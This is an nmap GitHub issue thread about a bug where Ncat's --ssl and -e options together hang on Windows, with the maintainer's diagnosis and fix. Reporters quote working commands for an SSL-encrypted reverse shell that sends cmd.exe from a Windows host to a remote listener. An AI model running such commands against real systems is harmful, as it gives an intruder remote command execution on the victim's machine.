### ISSUE TITLE
Ncat client --ssl with -e does not work on Windows

### ISSUE THREAD

**Issue by dmiller-nmap** [nmap/nmap#1267]
Reported:

> 
> I was conducting a red team test the other day and noticed that when I was trying to send a cmd.exe using the --ssl option of ncat to a remote ncat listener on a Linux box, although the connection did return and we could see the shell popping, whenever you try typing any command, it becomes unresponsive and the ncat on the Windows box seems to be entering a big loop of printing out debugging messages becoming unresponsive as well.
> 
> When I used ncat through socat so that socat did the ssl encryption, it worked fine.

**Comment by dmiller-nmap** [comment]
In my testing, change 420618c fixes the SSL error, but I don't get any further output from the shell. Entering `dir` doesn't return any output.  On the client side (`ncat --ssl -e cmd localhost`) I see

    NCAT DEBUG: i == WAIT_OBJECT_0

every time I strike Enter on the server (shell) side.

**Comment by dmiller-nmap** [comment]
All right! Fix is in SVN, will be mirrored to Github within an hour. Problems included:

1. `WaitForMultipleObjects` only tells you the first of the events that signalled,
2. `SSL_read` doesn't clear the event, so `WaitForMultipleObjects` keeps notifying that the socket needs a read.

So the subprocess never got a chance to send any data to the socket.

**Comment by gvanem** [comment]
How did got closed? The *fix* doesn't even compile. See my comment [here](https://github.com/nmap/nmap/commit/f31ef12ca36016018b7d96a4026759d98cfbcc3c).

**Comment by SeanDHeath** [comment]
I'm still running into this issue using ncat 7.70 on Linux and Windows:

Linux: 
`ncat -lp 4444 --ssl`
Windows:
`ncat --ssl -e cmd.exe <linux ip> 4444`

It connects and I get the command prompt on the Linux box but as soon as I enter a command the Windows box starts spamming:
`NCAT DEBUG: SSL error on 84: error:0000002:lib(0):func(0):system lib`

**Comment by dmiller-nmap** [comment]
@SeanDHeath The fix has not been released. It will be included in the next release of Ncat.

@gvanem Sorry about the late reply. I saw your comment and made the fix in 7629f3b997
